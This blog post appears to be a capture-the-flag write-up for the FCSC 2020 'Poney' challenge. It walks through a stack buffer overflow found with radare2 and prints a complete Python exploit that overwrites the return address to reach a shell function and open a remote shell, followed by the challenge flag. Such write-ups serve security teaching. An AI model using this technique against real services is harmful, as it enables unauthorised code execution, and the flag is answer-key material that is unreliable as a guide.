<h1>The kittens have the answer – FCSC 2020 // Poney</h1>

<p>Published 2020-05-05 (last modified 2020-05-11) on <a href="https://blog.caturday-lovers.fr.nf/?p=144">blog.caturday-lovers.fr.nf</a>. Tags: anssi, buffer, code-execution, ecsc, fcsc, overflow, poney, ret, shell.</p>

<figure class="wp-block-image"><img src="https://blog.caturday-lovers.fr.nf/wp-content/uploads/2020/05/2020-05-05_14h13_04-1.png" alt="Challenge description"></figure>

<h2 class="wp-block-heading">Intro</h2>

<p>Well, apart from the fact that the title brings back great memories from the spirit-lan, we have a small reverse-engineering challenge.</p>

<h2 class="wp-block-heading">Give me the correct input, and I will give you a shell :</h2>

<p>Oh, really? Just that? It's too good to be true! What does radare2 tell us? It tells us the cake is a lie! We need a bit more than a correct input, and we are going to go through it together.</p>

<h2 class="wp-block-heading">Zone 49, May 2020, autopsy of the pony</h2>

<figure class="wp-block-image"><img src="https://blog.caturday-lovers.fr.nf/wp-content/uploads/2020/05/2020-05-05_14h25_43.png" alt="radare2 disassembly of main"><figcaption>Dr Bouchard, Dr Bouchard, there are lots of colours!!!!!</figcaption></figure>

<p>What do we see? In the main function we have two string outputs (at 400691 and 40069d) and the user input being read at 4006ae. For the moment I see no call to the function that would launch the shell. You know what that means? We are getting close to a buffer overflow with code execution.</p>

<h2 class="wp-block-heading">SHIELD WALL !!!!!!!</h2>

<p>Let's quickly explain the buffer overflow: the idea is to exceed the capacity of the buffer that receives our input, and to force the host program to execute something that was never intended (calc.exe, malicious code, shell access, ...).<br>How do we find the size of the buffer? In our case it is initialised at the start of main:<br><strong><em>; var int64_t var_20h @ rbp-0x20</em></strong><br>We know we are dealing with a 64-bit application, so the registers are 8 bytes wide (instead of 4 on 32-bit), and the buffer is initialised to hold 0x20 characters (32 characters in decimal).<br>So if we go past 0x28 characters (the 0x20-byte buffer plus the 8-byte saved rbp), we overrun the buffer and reach the critical zone. You can see it when the application returns the following error:</p>

<figure class="wp-block-image"><img src="https://blog.caturday-lovers.fr.nf/wp-content/uploads/2020/05/image-1.png" alt="Error message after overflowing the buffer"></figure>

<p>Now that we know how to break the pony's legs, it is time to fit it with bionic ones. The principle is to call the function we need, in our case shell, and once inside we have won.<br>To keep our code clean and avoid random crashes, we use a RET as a gadget to tidy things up before entering shell; no need to reinvent the wheel or compile an OS, we reuse the ones already in place:</p>

<figure class="wp-block-image"><img src="https://blog.caturday-lovers.fr.nf/wp-content/uploads/2020/05/image-2.png" alt="Disassembly of the shell function"><figcaption>the shell function, from which we borrow the RET and its entry point</figcaption></figure>

<h2 class="wp-block-heading">Exploit.py</h2>

<pre class="wp-block-code"><code>import socket
from pwn import cyclic, p64, hexdump

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell = "challenges1.france-cybersecurity-challenge.fr"
port = 4000
retAddr = 0x004006db    # lone RET borrowed from the shell function (see figure above)
shellAddr = 0x00400676  # entry point of the shell function
overflow = cyclic(0x20 + 8)  # 0x20-byte buffer + 8-byte saved rbp, then the return address
payload = overflow + p64(retAddr) + p64(shellAddr)

def SockClose():
    print("[*] Goodbye Mr Bond !")
    s.close()
    input()

def SockOpen():
    s.connect((shell, port))
    Exploit()

def Exploit():
    print("[*] Doing Black Magic")
    r = s.recv(1024)
    print(r)
    # wait for the challenge prompt before sending anything
    while b">>>" not in r:
        print("[?] Waiting for >>>")
        r = s.recv(1024)
        print(r)
    print("[!] Sending\n%s" % hexdump(payload))
    s.send(payload + b" \n")
    print("[!] Payload Sent")
    # simple interactive loop on the obtained shell
    while True:
        cmd = input("(EvilCat-Shell)$ ")
        s.send(cmd.encode() + b" \n")
        r = s.recv(1024)
        if not len(r):
            print("[!] DeadShell")
            break
        print(r.decode(errors="replace"))

try:
    SockOpen()
except Exception as e:
    print("[!] Exploit Error: %s" % e)
finally:
    SockClose()
</code></pre>

<figure class="wp-block-image"><img src="https://blog.caturday-lovers.fr.nf/wp-content/uploads/2020/05/image-3.png" alt="Exploit output with the flag"><figcaption>don't laugh at meeow</figcaption></figure>

<p>The contract is fulfilled: we have a shell, and our flag!</p>

<p>FCSC{725dd45f9c98099bcca6e9922beda74d381af1145dfce3b933512a380a356acf}</p>